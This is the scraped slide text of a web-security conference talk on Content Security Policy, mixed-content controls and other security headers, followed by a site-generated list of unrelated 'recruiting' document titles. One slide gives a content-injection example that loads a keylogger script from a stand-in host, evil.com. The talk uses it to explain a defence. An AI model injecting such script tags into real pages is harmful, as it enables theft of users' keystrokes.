Upload File

d3ldn17 - recruiting the browser

31
Recruiting The Browser @Scott_Helme | scotthelme.co.uk Scott Helme

Upload: imperva-incapsula

Post on 21-Jan-2018

90 views

Category:

Technology


4 download

Report

TRANSCRIPT

Page 1: D3LDN17 - Recruiting the Browser

Recruiting The Browser

@Scott_Helme |

scotthelme.co.uk

Scott Helme

Page 2: D3LDN17 - Recruiting the Browser
Page 3: D3LDN17 - Recruiting the Browser
Page 4: D3LDN17 - Recruiting the Browser
Page 5: D3LDN17 - Recruiting the Browser
Page 6: D3LDN17 - Recruiting the Browser
Page 7: D3LDN17 - Recruiting the Browser
Page 8: D3LDN17 - Recruiting the Browser
Page 9: D3LDN17 - Recruiting the Browser
Page 10: D3LDN17 - Recruiting the Browser

How security has evolved

Page 11: D3LDN17 - Recruiting the Browser

Browser support

Page 12: D3LDN17 - Recruiting the Browser

Content Security Policy

Page 13: D3LDN17 - Recruiting the Browser

Content Injection

<html>

<body>

<comment>

<script src=“evil.com/keylogger.js”></script>

</comment>

Page 14: D3LDN17 - Recruiting the Browser

What is CSP?

cache-control: max-age=0, no-cache

content-encoding: gzip

content-security-policy: [policy goes here]

date: Tue, 17 Oct 2017 11:30:00

server: Incapsula

status: 200

Page 15: D3LDN17 - Recruiting the Browser

child-src

connect-src

default-src

font-src

frame-src

CSP Directives

img-src

media-src

object-src

script-src

style-src

Page 16: D3LDN17 - Recruiting the Browser

A basic policy

Content-Security-Policy: default-src ‘self’ example.com

Page 17: D3LDN17 - Recruiting the Browser

Fine tuning

Content-Security-Policy: default-src ‘self’;

script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com

<script src="https://ajax.googleapis.com/.../jquery.min.js">

</script>

<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js">

</script>

Page 18: D3LDN17 - Recruiting the Browser

Fine tuning

Content-Security-Policy: default-src ‘self’;

script-src [source list];

style-src [source list];

img-src [source list];

frame-src [source list];

Page 19: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 20: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 21: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 22: D3LDN17 - Recruiting the Browser

Mixed-Content

block-all-mixed-content

<img src=“http://imgur.com/Incapsula-D3.png”>

Page 23: D3LDN17 - Recruiting the Browser

Mixed-Content

upgrade-insecure-

requests

<img src=“http://imgur.com/Incapsula-D3.png”>

Page 24: D3LDN17 - Recruiting the Browser

Testing CSP

Content-Security-Policy-Report-Only: [policy]

Console:

Refused to load the script

‘https://code.jquery.com/jquery.1.11.3min.js’ because it violates the

following Content Security Policy directive: script-src

Page 25: D3LDN17 - Recruiting the Browser

Testing CSP

Content-Security-Policy-Report-Only: [policy]

report-uri https://report-uri.io

{

"csp-report": {

"document-uri": "http://scotthelme.co.uk/blah/",

"violated-directive": "default-src https:",

”effective-directive": ”img-src",

"blocked-uri": "http://imgur.com" ...

Page 26: D3LDN17 - Recruiting the Browser
Page 27: D3LDN17 - Recruiting the Browser
Page 28: D3LDN17 - Recruiting the Browser

Content-Security-PolicyContent-Security-Policy-Report-OnlyX-Webkit-Content-Security-PolicyX-Content-Security-Policy

Public-Key-PinsPublic-Key-Pins-Report-Only

Other Security Headers

Expect-Staple

Expect-CT

X-Xss-Protection

Page 29: D3LDN17 - Recruiting the Browser
Page 30: D3LDN17 - Recruiting the Browser
Page 31: D3LDN17 - Recruiting the Browser

Secure all the things!

@Scott_Helme | scotthelme.co.uk

Scott Helme


Global Recruiting Trends 2017 - Human Resource Serviceshrs.wsu.edu/.../2015/09/linkedin-global-recruiting-trends-report.pdf · Global Recruiting Trends 2017 ... Global Recruiting

Recruiting Technology and Recruiting Software Trends

Recruiting, Retention, Results… - arms.recrs.comarms.recrs.com/admin/externalresources/c21/Recruiting_Handbook.pdf · Recruiting, Retention, Results ... Recruiting - Forecast Model

Recruiting headlines and social recruiting

Browser oh browser browser

Recruiting essentials social recruiting talent sourcing interim recruitment recruiting consultancy

Leveraging a Recruiting CRM for Campus Recruiting

College Recruiting Recruiting for West Coast Lacrosse players

Recruiting Hacks: Best Practices in Recruiting High Performers

Athletic Scholarships, Recruiting Calendars and Recruiting Eligibility Rules

RECRUITING TRENDS Brie 6 Scorecard on College Recruiting ......Recruiting Trend 2017-18 1 Brie 6 Scorecard on College Recruiting Each Recruiting Trends offers employers the opportunity

Social recruiting seminar facebook for recruiting 7.26.12

Jobvite: The Leading Recruiting Platform · driven recruiting platform accelerates recruiting with an easy-to-use Applicant Tracking System (ATS), social recruiting capabilities,

ADP Recruiting Management · ADP Recruiting Management 7 About ADP® Recruiting Management ADP® Recruiting Management is an all-in-one recruiting automation platform, supporting

Mobile Recruiting from OnRec Gravity Recruiting

Recruiting For RecRuiting - State Auto Insurance - … recruiting Manual recruiting new producers

Recruiting Module 2. Strategic Recruiting Decisions Sample Sample Organization-Based vs. Outsourced Recruiting Recruiting Presence and Image Training

Social Recruiting MacGyver Style: Recruiting on Facebook

D3LDN17 - Keynote

RECRUITING DER ZUKUNFT: ROBOT RECRUITING · Ist Robot-Recruiting reine Fiktion oder schon bald Wirklichkeit? Recruiting-Experte Joachim Diercks wirft im Recruiting-Experte Joachim

Enriching Web Applications with Browser-to-Browser ...asc.di.fct.unl.pt/~jleitao/students/AlbertLindeMsc.pdf · Enriching Web Applications with Browser-to-Browser Communication

BrightMove Recruiting Software Social Media Recruiting Guide

RECRUITING GUIDE - North Pacific Juniors Volleyball Club · RECRUITING GUIDE Year by Year recruiting guide from Volleyballrecruits.net Official recruiting tool of USA Volleyball

Facebook Recruiting Fan Page HireClix - Social Media Recruiting

Recruiting Location Code Status Recruiting Location

Recruiting and Retaining Dental Recruiting and Retaining

Recruiting Immigrant Workers EuRopE Recruiting Immigrant ...languageforwork.ecml.at/Portals/48/ICT_REV_LFW... · Recruiting Immigrant Workers EuRopE Recruiting Immigrant Workers EuRopE

D3LDN17 - A Pragmatists Guide to DDoS Mitigation

Technology Recruiting solutions - Perceptive Recruiting · The technology recruiting solutions from Perceptive Recruiting have helped many businesses turn the stress of meeting their

Social recruiting seminar facebook for recruiting 4.26.12

Recruiting in Labor Markets Chapter 6 6–2 Strategic Recruiting Decisions Sample Sample Organization-Based vs. Outsourced Recruiting Recruiting Presence

Recruiting & Onboarding - sap.lianacms.comsap.lianacms.com/.../recruiting-onboarding-presentation.pdf · Onboarding . Learning ... Career Planning . Offboarding Recruiting . Marketing

Cross browser testing with browser stack

U.S. Army Recruiting Command U.S. Army Recruiting Command

Recruiting veterans - HireClix -social recruiting seminar - recruiting veterans through social media 8.9.12